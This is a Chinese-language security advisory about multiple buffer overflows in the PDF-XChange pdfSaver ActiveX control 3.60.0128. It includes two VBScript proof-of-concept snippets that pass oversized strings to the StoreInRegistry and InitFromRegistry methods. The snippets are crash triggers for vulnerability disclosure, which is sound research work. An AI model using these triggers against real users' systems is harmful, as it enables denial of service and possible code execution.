PDF-XChange pdfSaver ActiveX多个缓冲区溢出漏洞
PDF-XChange pdfSaver ActiveX多个缓冲区溢出漏洞
发布日期:2012-01-29
更新日期:2012-10-16
受影响系统:
Tracker Software Products PDF-XChange pdfSaver ActiveX 3.60.0128
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 51712
PDF-XChange Viewer是免费的多功能PDF阅读器。
PDF-XChange pdfSaver ActiveX 3.60.0128及其他版本存在多个缓冲区溢出漏洞,攻击者可利用这些漏洞在受影响应用中执行任意代码。
<*来源:LiquidWorm
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<object classid='clsid:2EE01CFA-139F-431E-BB1D-5E56B4DCEC18' id='zsl' />
<script language='vbscript'>
targetFile = "C:\PDF-XChange\pdfSaver\pdfxctrl.dll"
prototype = "Sub StoreInRegistry ( ByVal page_id As PdfPrinterDialogPage , ByVal sub_path As String )"
memberName = "StoreInRegistry"
progid = "pdfxctrlLib.PdfPrinterPreferences"
argCount = 2
arg1=1
arg2=String(6164, "A")
zsl.StoreInRegistry arg1 ,arg2
</script>
--------------------
<object classid='clsid:2EE01CFA-139F-431E-BB1D-5E56B4DCEC18' id='zsl' />
<script language='vbscript'>
targetFile = "C:\PDF-XChange\pdfSaver\pdfxctrl.dll"
prototype = "Sub InitFromRegistry ( ByVal page_id As PdfPrinterDialogPage , ByVal sub_key As String )"
memberName = "InitFromRegistry"
progid = "pdfxctrlLib.PdfPrinterPreferences"
argCount = 2
arg1=1
arg2=String(14356, "A")
zsl.InitFromRegistry arg1 ,arg2
</script>
建议:
--------------------------------------------------------------------------------
厂商补丁:
Tracker Software Products
-------------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.docu-track.com/home/prod_user/
评论暂时关闭